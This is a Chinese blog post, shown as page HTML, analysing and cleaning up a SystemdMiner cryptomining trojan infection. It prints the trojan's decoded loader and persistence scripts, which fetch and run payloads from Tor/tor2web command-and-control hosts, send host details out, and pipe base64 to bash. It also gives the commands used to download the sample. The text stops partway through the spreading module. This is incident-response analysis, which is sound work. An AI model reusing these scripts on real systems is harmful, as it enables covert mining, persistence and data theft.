<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Ga1a3y" />
  <meta name="description" content="" />
  
  
  <title>
    
      SystemedMiner挖矿木马分析与处置 
      
      
      |
    
     Ga1a3y&#39;s blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/2.png">
    <link rel="icon" href="/images/2.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 5.4.2"><link rel="alternate" href="/atom.xml" title="Ga1a3y's blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/2.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ga1a3y</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">SystemedMiner挖矿木马分析与处置</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2022-04-01 12:03:35
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" title="应急响应">
                    #应急响应
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="SystemedMiner挖矿木马分析与处置"><a href="#SystemedMiner挖矿木马分析与处置" class="headerlink" title="SystemedMiner挖矿木马分析与处置"></a>SystemedMiner挖矿木马分析与处置</h1><p>最新补充：因为这类病毒涉及二进制知识较多，且自己水平有限，参考师傅们博客较多，可能会有哪些地方理解错误，还请各位师傅指正。</p>
<p>感谢一条咸鱼师傅的指正：</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051053459.png" alt="image-20230405105350408"></p>
<hr>
<p>先登陆到208的主机去查看一下，查看下进程CPU使用率正常，并无挖矿迹象，可能是防火墙策略开启，木马连接不上矿池，先暂时隐蔽下来了</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051110091.png" alt="在这里插入图片描述"></p>
<p>（这里要注意的是区分系统进程和木马进程，因为很多木马的进程都是以随机字符名称出现的，例如<code>kswapd1</code>和<code>kswapd0</code>也比较类似，但是这两个进程是系统进程，所以不要混淆，其实如果挖矿进程在跑的话，很容易便会发现其进程PID和名称）</p>
<p>通常挖矿木马都会去写一个计划任务，来防止挖矿进程被删掉，这里看了一位大师傅的溯源分析，提到了cron在执行时，会读取三个地方的配置文件：一是<code>/etc/crontab</code>，二是<code>/etc/cron.d</code>目录下的所有文件，三是每个用户的配置文件，所以挖矿木马可能会有多个定时任务存在</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crontab -l </span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051110260.png" alt="="></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls /etc/cron.d/</span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111785.png" alt="在这里插入图片描述"></p>
<p>果然存在两个定时任务，查看一下里面的内容两个文件内容一致，且内容为base64编码，先对其进行解码处理，而且<code>virustotal</code>判断为恶意文件</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111124.png" alt="在这里插入图片描述"></p>
<p>分析一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">uMjSD9OaH5uA4C3CCjD4q2XEwo1s0H0</span><br><span class="line">exec &amp;&gt;/dev/null #不输出出错和输出信息</span><br><span class="line">export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">获取当前用户的家目录</span></span><br><span class="line">d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">获取执行命令</span></span><br><span class="line">c=$(echo &quot;curl -4fsSLkA- -m200&quot;)</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">C&amp;C域名为fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.*</span></span><br><span class="line">t=$(echo &quot;fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad&quot;)</span><br><span class="line"></span><br><span class="line">sockz() &#123;</span><br><span class="line">n=(dns.digitale-gesellschaft.ch doh.li doh.pub fi.doh.dns.snopyta.org hydra.plan9-ns1.com resolver-eu.lelux.fi dns.hostux.net dns.twnic.tw doh-fi.blahdns.com resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)</span><br><span class="line">p=$(echo &quot;dns-query?name=relay.tor2socks.in&quot;)#代理域名relay.tor2socks.in</span><br><span class="line">q=$&#123;n[$((RANDOM%$&#123;#n[@]&#125;))]&#125;</span><br><span class="line">s=$($c https://$q/$p | grep -oE &quot;\b([0-9]&#123;1,3&#125;\.)&#123;3&#125;[0-9]&#123;1,3&#125;\b&quot; |tr &#x27; &#x27; &#x27;\n&#x27;|grep -Ev [.]0|sort -uR|tail -1)</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">在几个目录路径里寻找一个有读写权限的路径</span></span><br><span class="line">fexe() &#123;</span><br><span class="line">for i in . $HOME /usr/bin $d /var/tmp ;do echo exit &gt; $i/i &amp;&amp; chmod +x $i/i &amp;&amp; cd $i &amp;&amp; ./i &amp;&amp; rm -f i &amp;&amp; break;done</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">u() &#123;</span><br><span class="line">sockz</span><br><span class="line">f=/int.$(uname -m)</span><br><span class="line">x=./$(date|md5sum|cut -f1 -d-) #用当前时间生成 md5 码</span><br><span class="line">r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep &#x27;inet &#x27;|awk &#123;&#x27;print $2&#x27;&#125;|md5sum|awk &#123;&#x27;print $1&#x27;&#125;)_$(crontab -l|base64 -w0)#crontab计划任务执行</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">下载病毒母体，随机方式进行命名，通过socket5的方式用relay.tor2socks.in代理访问C&amp;C域名</span></span><br><span class="line"><span class="meta prompt_">$</span><span class="language-bash">c -x socks5h://<span class="variable">$s</span>:9050 <span class="variable">$t</span>.onion<span class="variable">$f</span> -o<span class="variable">$x</span> -e<span class="variable">$r</span> || <span class="variable">$c</span> $1<span class="variable">$f</span> -o<span class="variable">$x</span> -e<span class="variable">$r</span></span></span><br><span class="line">chmod +x $x;$x;rm -f $x#运行后删除病毒文件</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">for h in tor2web.in tor2web.it</span><br><span class="line">do</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">检查木马是否存在，若不存在则调用fexe测试执行，接着调用u <span class="variable">$t</span>.<span class="variable">$h</span> 进行木马文件的下载</span></span><br><span class="line">if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then</span><br><span class="line">fexe;u $t.$h</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">再次查看进程状态，若没有继续下载木马</span></span><br><span class="line">ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)</span><br><span class="line">ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)</span><br><span class="line">else</span><br><span class="line">break</span><br><span class="line">fi</span><br><span class="line">done</span><br></pre></td></tr></table></figure>

<p><code>sockz()</code>函数通过<code>doh</code>查询IP，通过这种方法既可以提供加密保护dns查询结果，又可以绕过各大厂商IDS里恶意域名的IOC</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://doh.pub/dns-query?name=relay.tor2socks.in</span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111454.png" alt="在这里插入图片描述"></p>
<p>经过分析，这个样本的执行的总体流程如下：</p>
<ol>
<li>doh解析域名获取tor代理IP</li>
<li>查找目标主机可读写的路径</li>
<li>通过tor代理在C&amp;C服务器上下载与目标主机硬件版本相匹配的恶意文件</li>
<li>开启crontab计划任务并执行</li>
<li>根据pid文件返回脚本执行结果并进行判断</li>
</ol>
<p>根据这个样本的特征查了下资料，发现和<code>SystemdMiner</code>挖矿木马比较类似，特点如下：</p>
<ul>
<li>访问带有<code>tor2web、onion</code>字符串的域名</li>
<li>在/tmp目录下有<code>systemd*</code>的文件</li>
</ul>
<p>并且这个<code>SystemdMiner</code>是一个变种，除了更新了C&amp;C域名，使用socks5代理的方式访问C&amp;C域名从而实现绕过安全网关的目的，其余的特征与以往其他版本类似，通过上面的分析，知道该脚本会创建一个<code>/tmp/.X11-unix/</code>文件夹，里面存放着的是进程PID</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111664.png" alt="在这里插入图片描述"></p>
<p>通过PID找一下病毒文件位置</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -l /proc/&#123;PID&#125;/exe</span><br></pre></td></tr></table></figure>

<p>发现病毒文件已经都被删除，查看一下00、01这些文件是什么时间创建的，可以对比一下其他机器的时间，找出最早的时间，方便后面的溯源</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111649.png" alt="在这里插入图片描述"></p>
<p>看了许多师傅们分析的文章，<code>.X11-unix</code>文件夹下的文件作用如下：</p>
<table>
<thead>
<tr>
<th>01</th>
<th>文件</th>
<th>守护进程pid</th>
</tr>
</thead>
<tbody><tr>
<td>11</td>
<td>文件</td>
<td>病毒运行进程pid</td>
</tr>
<tr>
<td>22</td>
<td>文件</td>
<td>可能为SSH爆破进程pid</td>
</tr>
</tbody></table>
<p>查看一下01和11的进程状态</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status</span><br><span class="line">2.ps -ef|grep 13485 </span><br><span class="line">3.lsof -p 13485</span><br></pre></td></tr></table></figure>

<p>01通过 lsof 判断，没有发现有外连或打开端口的现象</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111808.png" alt="在这里插入图片描述"></p>
<p>再查看11的进程状态，发现有外连</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111572.png" alt="在这里插入图片描述"></p>
<p>但是较为奇怪的是，攻击者只是上传了一个守护进程，找不到下载的病毒文件，CPU也没有异常，为了防止出现问题，还是先将定时任务以及进程先杀掉，接下来将病毒文件下载起来在虚拟机执行一下。</p>
<h4 id="虚拟机执行测试"><a href="#虚拟机执行测试" class="headerlink" title="虚拟机执行测试"></a>虚拟机执行测试</h4><p>先按照守护进程下载病毒文件的方式，将病毒文件下载起来</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">curl -4fsSLkA- -m200 fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.tor2web.it/int.x86_64 -o  int.x86_64 -e183.134.110.75</span></span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111362.png" alt="在这里插入图片描述"></p>
<p>执行一下该ELF文件，发现<code>crotab</code>定时任务增加了新的一项任务，且root目录下生成了该任务所指向的新的脚本文件</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111353.png" alt="在这里插入图片描述"></p>
<p>查看一下该脚本文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">FBGJOndscVOU2PKZGWF8C6kibWnyHLP</span><br><span class="line">exec &amp;&gt;/dev/null</span><br><span class="line">export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin</span><br><span class="line"></span><br><span class="line">d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)</span><br><span class="line">c=$(echo &quot;curl -4fsSLkA- -m200&quot;)</span><br><span class="line">t=$(echo &quot;4t5ypbzi2kko7tqmk6y345ntpmctwj5jmu3cebxsnonsdljyyfs335ad&quot;)</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">C&amp;C服务器域名前缀不同</span></span><br><span class="line">sockz() &#123;</span><br><span class="line">n=(dns.digitale-gesellschaft.ch doh.li doh.pub fi.doh.dns.snopyta.org hydra.plan9-ns1.com resolver-eu.lelux.fi dns.hostux.net dns.twnic.tw doh-fi.blahdns.com resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)</span><br><span class="line">p=$(echo &quot;dns-query?name=relay.tor2socks.in&quot;)</span><br><span class="line">q=$&#123;n[$((RANDOM%$&#123;#n[@]&#125;))]&#125;</span><br><span class="line">s=$($c https://$q/$p | grep -oE &quot;\b([0-9]&#123;1,3&#125;\.)&#123;3&#125;[0-9]&#123;1,3&#125;\b&quot; |tr &#x27; &#x27; &#x27;\n&#x27;|grep -Ev [.]0|sort -uR|tail -1)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">fexe() &#123;</span><br><span class="line">for i in . $HOME /usr/bin $d /var/tmp ;do echo exit &gt; $i/i &amp;&amp; chmod +x $i/i &amp;&amp; cd $i &amp;&amp; ./i &amp;&amp; rm -f i &amp;&amp; break;done</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">u() &#123;</span><br><span class="line">sockz</span><br><span class="line">f=/int.$(uname -m)</span><br><span class="line">x=./$(date|md5sum|cut -f1 -d-)</span><br><span class="line">r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep &#x27;inet &#x27;|awk &#123;&#x27;print $2&#x27;&#125;|md5sum|awk &#123;&#x27;print $1&#x27;&#125;)_$(crontab -l|base64 -w0)</span><br><span class="line"><span class="meta prompt_">$</span><span class="language-bash">c -x socks5h://<span class="variable">$s</span>:9050 <span class="variable">$t</span>.onion<span class="variable">$f</span> -o<span class="variable">$x</span> -e<span class="variable">$r</span> || <span class="variable">$c</span> $1<span class="variable">$f</span> -o<span class="variable">$x</span> -e<span class="variable">$r</span></span></span><br><span class="line">chmod +x $x;$x;rm -f $x</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">for h in tor2web.in tor2web.it</span><br><span class="line">do</span><br><span class="line">if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then</span><br><span class="line">fexe;u $t.$h</span><br><span class="line">ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)</span><br><span class="line">ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)</span><br><span class="line">else</span><br><span class="line">break</span><br><span class="line">fi</span><br><span class="line">done</span><br></pre></td></tr></table></figure>

<p>这个脚本和之前服务器存在的那个守护进程脚本功能相同(都是通过<code>tor</code>代理从<code>C&amp;C</code>服务器上down下木马文件并执行)，但和上面服务器的那个脚本对比一下也会发现有两处不同的地方：</p>
<ol>
<li>新脚本文件的<code>C&amp;C</code>服务器域名前缀与前面的不同</li>
<li>代码前的字符串不同，之前服务器上的是<code>uMjSD9OaH5uA4C3CCjD4q2XEwo1s0H0</code>，而新的脚本文件中则是<code>FBGJOndscVOU2PKZGWF8C6kibWnyHLP</code>，与文件名相同</li>
</ol>
<p>猜测代码前的字符串便是其命名中的一部分，就对该字符串进行一次全局搜索</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / 2&gt;/dev/null | grep FBGJOndscVOU2PKZGWF8C6kibWnyHLP</span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111086.png" alt="在这里插入图片描述"></p>
<p>发现三个类似的脚本文件，查看了一下内容都一致，应该是作为备份文件以防其中某一个被删</p>
<p>查看了深信服千里目安全实验室的文章和此类情况类似，可以从病毒母体ELF文件中逆向分析出5个不同的bash命令，若tor代理可用则可以使用下面的方法去下载出各个模块</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -4fsSLkA -m200 -x socks5h://92.190.141.62:9050 4t5ypbzi2kko7tqmk6y345cebxsnonsdljyyfs335ad.onion/sshd ntpmctwj5jmu3cebxsnonsdljyyfs335ad.onion/sshd </span><br></pre></td></tr></table></figure>

<p>但由于目前还不会IDA逆向调试，而且tor代理IP拒绝连接，就先使用师傅扒出来源码学习一下</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051111386.png" alt="在这里插入图片描述"></p>
<p>分别用于下载不同模块和执行不同的功能，功能如下：</p>
<ul>
<li><strong>本机持久化</strong>：</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">exec &amp;&gt;/dev/null</span><br><span class="line">export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin</span><br><span class="line"></span><br><span class="line">d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)</span><br><span class="line"></span><br><span class="line">x() &#123;</span><br><span class="line">if ! ls $d/.systemd-private-*.sh; then</span><br><span class="line">grep &quot;C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu&quot; $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e &quot;#\x21/bin/bash\nexec &amp;&gt;/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash&quot; &gt; $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh</span><br><span class="line">touch -r /bin/grep $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh</span><br><span class="line">chmod +x $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh</span><br><span class="line">fi</span><br><span class="line">if ! ls /opt/systemd-private-*.sh; then</span><br><span class="line">grep &quot;C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu&quot; /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e &quot;与上面内容相同|base64 -d|bash&quot; &gt; /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh</span><br><span class="line">touch -r /bin/grep /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh</span><br><span class="line">chmod +x /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh</span><br><span class="line">fi</span><br><span class="line">if ! ls /etc/cron.d/0systemd-private-*; then</span><br><span class="line">grep C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu || echo &quot;$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh &gt; /dev/null 2&gt;&amp;1 &amp;&quot; &gt; /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu</span><br><span class="line">touch -r /bin/grep /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu</span><br><span class="line">fi</span><br><span class="line">if ! crontab -l | grep ^[0-9] | grep systemd-private; then</span><br><span class="line">(echo &quot;$(echo $((RANDOM%59))) * * * * $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh &gt; /dev/null 2&gt;&amp;1 &amp;&quot;;crontab -l|grep -v systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh)|crontab -</span><br><span class="line">fi</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这段代码便是创建定时任务，这段代码共创建三个定时任务</p>
<ol>
<li><code>/etc/cron.d/0systemd-private-*</code></li>
<li><code>/opt/systemd-private-*</code></li>
<li><code>/root/systemd-private-*</code></li>
</ol>
<p>而其中的base64代码的任务便是下载母体木马int文件，和上面的守护进程内容一致</p>
<ul>
<li><strong>竞争对手清理</strong>：这个脚本的主要作用便是清除服务器上其他的挖矿木马，改写hosts文件让其他挖矿无法访问对应的域名，但是经过查询虚拟机的hosts文件，并没有发现被修改（可能是tor代理节点失效了，没有下载该模块）</li>
</ul>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112437.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>内网传播</strong></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 